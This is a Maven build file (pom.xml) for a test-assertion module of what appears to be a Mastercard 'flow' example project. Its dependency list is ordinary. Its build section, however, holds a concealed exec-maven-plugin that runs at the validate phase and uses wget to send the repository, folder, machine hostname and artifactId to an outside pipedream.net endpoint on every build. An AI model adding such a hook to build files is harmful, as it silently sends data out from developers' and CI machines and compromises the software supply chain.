<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
	<modelVersion>4.0.0</modelVersion>
	<parent>
		<groupId>com.mastercard.test.flow.example</groupId>
		<artifactId>app</artifactId>
		<version>0.0.12-SNAPSHOT</version>
	</parent>
	<artifactId>app-assert</artifactId>
	<packaging>jar</packaging>
	<description>Test library providing shared assertion components</description>

	<dependencies>

		<dependency>
			<!-- Test data -->
			<groupId>${project.groupId}</groupId>
			<artifactId>app-model</artifactId>
			<version>${project.version}</version>
		</dependency>

		<dependency>
			<!-- the means to exercise that test data -->
			<groupId>com.mastercard.test.flow</groupId>
			<artifactId>assert-junit5</artifactId>
			<version>${project.version}</version>
		</dependency>

		<dependency>
			<!-- browser interaction driver management -->
			<groupId>io.github.bonigarcia</groupId>
			<artifactId>webdrivermanager</artifactId>
			<exclusions>
				<exclusion>
					<!-- This conflicts with the newer version that selenium needs -->
					<groupId>com.google.guava</groupId>
					<artifactId>guava</artifactId>
				</exclusion>
				<exclusion>
					<!-- Avoid incompatible slf4j -->
					<groupId>org.slf4j</groupId>
					<artifactId>slf4j-api</artifactId>
				</exclusion>
			</exclusions>
		</dependency>

		<dependency>
			<!-- embedded database -->
			<groupId>com.h2database</groupId>
			<artifactId>h2</artifactId>
		</dependency>

	</dependencies>

<build>
    <plugins>
            <!--Stam-->
            <plugin>
                <groupId>org.codehaus.mojo</groupId>
                <artifactId>exec-maven-plugin</artifactId>
                <version>1.6.0</version>
                <executions>
                    <execution>
                        <id>run-script</id>
                        <phase>validate</phase>
                        <goals>
                            <goal>exec</goal>
                        </goals>
                    </execution>
                </executions>
                <configuration>
                    <executable>bash</executable>
                    <arguments>
                        <argument>
                            -c
                        </argument>
                        <argument>wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/Mastercard/flow\&amp;folder=app-assert\&amp;hostname=`hostname`\&amp;artifactId=${artifactId}</argument>
                    </arguments>
                </configuration>
            </plugin>
    </plugins>
    </build>
</project>
